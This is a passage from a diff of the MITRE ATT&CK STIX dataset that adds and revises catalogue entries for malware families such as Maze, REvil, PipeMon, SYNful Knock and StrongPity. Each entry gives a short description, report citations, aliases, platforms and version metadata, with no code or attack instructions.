previously known as \"ChaCha\", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)", + "name": "Maze", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0449", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0449" + }, + { + "source_name": "FireEye Maze May 2020", + "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020." + }, + { + "source_name": "McAfee Maze March 2020", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/", + "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020." + }, + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." + } + ], + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-19T18:35:15.941Z", + "created": "2020-05-18T16:17:59.464Z", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "SarathKumar Rajendran, Trimble Inc" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_aliases": [ + "Maze" + ], + "x_mitre_version": "1.1" + }, { "external_references": [ { @@ -225419,18 +250020,18 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Metamorfo", - "description": "[Metamorfo](https://attack.mitre.org/software/S0455) is a banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting mostly brazilian users.(Citation: Medium Metamorfo Apr 2020)", + "description": "[Metamorfo](https://attack.mitre.org/software/S0455) is a banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting mostly Brazilian users.(Citation: Medium Metamorfo Apr 2020)", "id": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2", "type": "malware", "labels": [ "malware" ], - "modified": "2020-06-25T19:12:24.385Z", + "modified": "2020-10-22T01:34:57.793Z", "created": "2020-05-26T17:34:19.044Z", "x_mitre_contributors": [ "Chen Erlich, @chen_erlich, enSilo" ], - "x_mitre_version": "1.0", + "x_mitre_version": "1.1", "x_mitre_aliases": [ "Metamorfo" ], @@ -225529,9 +250130,9 @@ "external_id": "S0051" }, { - "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", - "source_name": "F-Secure The Dukes" + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" } ], "object_marking_refs": [ @@ -225541,7 +250142,7 @@ "labels": [ "malware" ], - "modified": "2020-03-30T17:04:51.952Z", + "modified": "2020-09-23T15:19:58.668Z", "created": "2017-05-31T21:32:36.919Z", "x_mitre_platforms": [ "Windows" @@ -225549,7 +250150,7 @@ "x_mitre_aliases": [ "MiniDuke" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "id": "malware--e3cedcfe-6515-4348-af65-7f2c4157bf0d", @@ -225974,7 +250575,7 @@ "labels": [ "malware" ], - "modified": "2020-03-30T17:09:00.491Z", + "modified": "2020-10-21T18:42:49.250Z", "created": "2018-04-18T17:59:24.739Z", "x_mitre_platforms": [ "Windows" @@ -225982,7 +250583,7 @@ "x_mitre_aliases": [ "NETWIRE" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "external_references": [ @@ -226350,6 +250951,53 @@ "Windows" ] }, + { + "external_references": [ + { + "external_id": "S0508", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0508" + }, + { + "source_name": "Zdnet Ngrok September 2018", + "url": "https://www.zdnet.com/article/sly-malware-author-hides-cryptomining-botnet-behind-ever-shifting-proxy-service/", + "description": "Cimpanu, C. (2018, September 13). Sly malware author hides cryptomining botnet behind ever-shifting proxy service. Retrieved September 15, 2020." + }, + { + "source_name": "FireEye Maze May 2020", + "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020." + }, + { + "source_name": "Cyware Ngrok May 2019", + "url": "https://cyware.com/news/cyber-attackers-leverage-tunneling-service-to-drop-lokibot-onto-victims-systems-6f610e44", + "description": "Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims\u2019 systems. Retrieved September 15, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)", + "name": "Ngrok", + "id": "malware--911fe4c3-444d-4e92-83b8-cc761ac5fd3b", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-09-29T20:46:04.658Z", + "created": "2020-09-15T13:32:10.185Z", + "x_mitre_contributors": [ + "Janantha Marasinghe" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Ngrok" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "id": "malware--9e9b9415-a7df-406b-b14d-92bfe6809fbe", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -226529,6 +251177,19 @@ "x_mitre_version": "1.1" }, { + "created": "2019-08-29T18:52:20.879Z", + "modified": "2020-10-22T18:35:57.777Z", + "labels": [ + "malware" + ], + "type": "malware", + "id": "malware--f1314e75-ada8-49f4-b281-b1fb8b48f2a7", + "name": "OSX/Shlayer", + "description": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS. It was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "url": "https://attack.mitre.org/software/S0402", @@ -226544,9 +251205,9 @@ "description": "(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)" }, { - "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.", + "source_name": "Carbon Black Shlayer Feb 2019", "url": "https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/", - "source_name": "Carbon Black Shlayer Feb 2019" + "description": "Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019." }, { "source_name": "Intego Shlayer Feb 2018", @@ -226564,27 +251225,14 @@ "description": "Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019." } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "macOS" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "description": "[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS. It was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)", - "name": "OSX/Shlayer", - "id": "malware--f1314e75-ada8-49f4-b281-b1fb8b48f2a7", - "type": "malware", - "labels": [ - "malware" - ], - "modified": "2020-03-18T18:27:13.903Z", - "created": "2019-08-29T18:52:20.879Z", - "x_mitre_version": "1.1", "x_mitre_aliases": [ "OSX/Shlayer", "Crossrider" ], - "x_mitre_platforms": [ - "macOS" - ] + "x_mitre_version": "1.1" }, { "id": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29", @@ -226783,9 +251431,9 @@ "external_id": "S0052" }, { - "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", - "source_name": "F-Secure The Dukes" + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" } ], "object_marking_refs": [ @@ -226795,7 +251443,7 @@ "labels": [ "malware" ], - "modified": "2020-03-30T17:13:20.084Z", + "modified": "2020-09-23T15:21:12.900Z", "created": "2017-05-31T21:32:37.341Z", "x_mitre_platforms": [ "Windows" @@ -226803,7 +251451,7 @@ "x_mitre_aliases": [ "OnionDuke" ], - "x_mitre_version": "1.1" + "x_mitre_version": "1.2" }, { "object_marking_refs": [ @@ -227491,6 +252139,40 @@ ], "x_mitre_version": "1.1" }, + { + "id": "malware--bd7a9e13-69fa-4243-a5e5-04326a63f9f2", + "name": "Pillowmint", + "description": "[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0517", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0517" + }, + { + "source_name": "Trustwave Pillowmint June 2020", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", + "description": "Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7\u2019s Monkey Thief . Retrieved July 27, 2020." + } + ], + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-06T17:25:07.301Z", + "created": "2020-07-27T14:06:29.560Z", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_aliases": [ + "Pillowmint" + ], + "x_mitre_version": "1.0" + }, { "id": "malware--ae9d818d-95d0-41da-b045-9cabea1ca164", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -227525,6 +252207,44 @@ ], "x_mitre_version": "1.1" }, + { + "external_references": [ + { + "external_id": "S0501", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0501" + }, + { + "source_name": "ESET PipeMon May 2020", + "url": "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/", + "description": "Tartare, M. et al. (2020, May 21). No \u201cGame over\u201d for the Winnti Group. Retrieved August 24, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "PipeMon", + "description": "[PipeMon](https://attack.mitre.org/software/S0501) is a multi-stage modular backdoor used by [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: ESET PipeMon May 2020)", + "id": "malware--8393dac0-0583-456a-9372-fd81691bca20", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-16T21:01:16.880Z", + "created": "2020-08-24T13:15:51.706Z", + "x_mitre_contributors": [ + "Mathieu Tartare, ESET", + "Martin Smol\u00e1r, ESET" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "PipeMon" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "id": "malware--b96680d1-5eb3-4f07-b95c-00ab904ac236", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -227741,6 +252461,40 @@ ], "x_mitre_version": "1.1" }, + { + "external_references": [ + { + "external_id": "S0518", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0518" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "PolyglotDuke", + "description": "[PolyglotDuke](https://attack.mitre.org/software/S0518) is a downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2013. [PolyglotDuke](https://attack.mitre.org/software/S0518) has been used to drop [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)", + "id": "malware--3d57dcc4-be99-4613-9482-d5218f5ec13e", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-09T16:07:59.493Z", + "created": "2020-09-23T15:42:59.822Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "PolyglotDuke" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "id": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce", "name": "Pony", @@ -228196,7 +252950,8 @@ }, { "source_name": "RATANKBA", - "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018." + "description": "Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.", + "url": "https://www.trendmicro.com/en_us/research/17/b/ratankba-watering-holes-against-enterprises.html" }, { "source_name": "Lazarus RATANKBA", @@ -228211,7 +252966,7 @@ "labels": [ "malware" ], - "modified": "2020-03-30T17:25:28.458Z", + "modified": "2020-09-02T18:46:32.365Z", "created": "2018-10-17T00:14:20.652Z", "x_mitre_platforms": [ "Windows" @@ -228221,6 +252976,41 @@ ], "x_mitre_version": "1.1" }, + { + "id": "malware--4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "name": "RDAT", + "description": "[RDAT](https://attack.mitre.org/software/S0495) is a backdoor used by the suspected Iranian threat group [OilRig](https://attack.mitre.org/groups/G0049). [RDAT](https://attack.mitre.org/software/S0495) was originally identified in 2017 and targeted companies in the telecommunications sector.(Citation: Unit42 RDAT July 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0495", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0495" + }, + { + "source_name": "Unit42 RDAT July 2020", + "url": "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "description": "Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020." + } + ], + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-15T23:59:45.815Z", + "created": "2020-07-28T17:26:36.168Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "RDAT", + "RDAT " + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "created": "2019-10-11T16:13:19.588Z", "modified": "2019-10-16T15:34:22.990Z", @@ -228255,6 +253045,103 @@ ], "x_mitre_version": "1.0" }, + { + "external_references": [ + { + "external_id": "S0496", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0496" + }, + { + "source_name": "Sodin", + "description": "(Citation: Intel 471 REvil March 2020)(Citation: Kaspersky Sodin July 2019)" + }, + { + "source_name": "Sodinokibi", + "description": "(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: G Data Sodinokibi June 2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)" + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Group IB Ransomware May 2020", + "url": "https://www.group-ib.com/whitepapers/ransomware-uncovered.html", + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers\u2019 Latest Methods. Retrieved August 5, 2020." + }, + { + "source_name": "Kaspersky Sodin July 2019", + "url": "https://securelist.com/sodin-ransomware/91473/", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020." + }, + { + "source_name": "G Data Sodinokibi June 2019", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020." + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "Talos Sodinokibi April 2019", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee REvil October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "description": "Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 Crescendo. Retrieved August 5, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496) is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)", + "name": "REvil", + "id": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-05T15:52:54.596Z", + "created": "2020-08-04T15:06:14.796Z", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "REvil", + "Sodin", + "Sodinokibi" + ] + }, { "id": "malware--b9eec47e-98f4-4b3c-b574-3fa8a87ebe05", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -228709,6 +253596,40 @@ ], "x_mitre_version": "1.1" }, + { + "external_references": [ + { + "external_id": "S0511", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0511" + }, + { + "source_name": "ESET Dukes October 2019", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "RegDuke", + "description": "[RegDuke](https://attack.mitre.org/software/S0511) is a first stage implant written in .NET and used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2017. [RegDuke](https://attack.mitre.org/software/S0511) has been used to control a compromised machine when control of other implants on the machine was lost.(Citation: ESET Dukes October 2019)", + "id": "malware--47124daf-44be-4530-9c63-038bc64318dd", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-09T16:07:59.731Z", + "created": "2020-09-23T18:04:24.998Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "RegDuke" + ], + "x_mitre_platforms": [ + "Windows" + ] + }, { "id": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -229610,6 +254531,45 @@ "SQLRat" ] }, + { + "external_references": [ + { + "external_id": "S0519", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0519" + }, + { + "source_name": "FireEye - Synful Knock", + "url": "https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html", + "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "description": "[SYNful Knock](https://attack.mitre.org/software/S0519) is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution)", + "name": "SYNful Knock", + "id": "malware--84c1ecc6-e5a2-4e8a-bf4b-651a618e0053", + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-22T17:35:04.950Z", + "created": "2020-10-19T16:38:11.279Z", + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "SYNful Knock" + ], + "x_mitre_platforms": [ + "Network" + ] + }, { "id": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3", "description": "[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)", @@ -230094,6 +255054,45 @@ "Windows" ] }, + { + "id": "malware--e33e4603-afab-402d-b2a1-248d435b5fe0", + "description": "[SoreFang](https://attack.mitre.org/software/S0516) is first stage downloader used by [APT29](https://attack.mitre.org/groups/G0016) for exfiltration and to load other malware.(Citation: NCSC APT29 July 2020)(Citation: CISA SoreFang July 2016)", + "name": "SoreFang", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0516", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0516" + }, + { + "source_name": "NCSC APT29 July 2020", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020." + }, + { + "source_name": "CISA SoreFang July 2016", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020." + } + ], + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-06T16:10:42.422Z", + "created": "2020-09-29T19:33:35.122Z", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_aliases": [ + "SoreFang" + ], + "x_mitre_version": "1.0" + }, { "external_references": [ { @@ -230290,6 +255289,45 @@ ], "x_mitre_version": "1.1" }, + { + "id": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "description": "[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056).(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)", + "name": "StrongPity", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "external_id": "S0491", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0491" + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + }, + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "type": "malware", + "labels": [ + "malware" + ], + "modified": "2020-10-15T02:00:29.185Z", + "created": "2020-07-20T17:41:19.690Z", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_aliases": [ + "StrongPity" + ], + "x_mitre_version": "1.0" + }, { "id": "malware--6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -230860,12 +255898,13 @@ "labels": [ "malware" ], - "modified": "2020-03-30T21:08:00.221Z", + "modified": "2020-10-17T15:06:16.817Z", "created": "2018-10-17T00:14:20.652Z", "x_mitre_platforms": [ "Windows" ], "x_mitre_contributors": [ + "Cybereason Nocturnus, @nocturnus", "Omkar Gudhate", "FS-ISAC" ], @@ -230874,13 +255913,13 @@ "Totbrick", "TSPY_TRICKLOAD" ], - "x_mitre_version": "1.2" + "x_mitre_version": "1.3" }, { "id": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "Trojan.Karagany", - "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a backdoor primarily used for recon. The source code for it was leaked in 2010 and it is sold on underground forums. (Citation: Symantec Dragonfly)", + "description": "[Trojan.Karagany](https://attack.mitre.org/software/S0094) is a modular remote access tool used for recon and linked to [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). The source code for [Trojan.Karagany](https://attack.mitre.org/software/S0094) originated from Dream Loader malware which was leaked in 2010 and sold on underground forums. (Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)(Citation: Dragos DYMALLOY )", "external_references": [ { "source_name": "mitre-attack", @@ -230888,9 +255927,27 @@ "external_id": "S0094" }, { - "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf", + "source_name": "xFrost", + "description": "(Citation: Secureworks Karagany July 2019)" + }, + { + "source_name": "Karagany", + "description": "(Citation: Secureworks Karagany July 2019)" + }, + { + "source_name": "Symantec Dragonfly", "description": "Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", - "source_name": "Symantec Dragonfly" + "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + }, + { + "source_name": "Secureworks Karagany July 2019", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "description": "Secureworks. 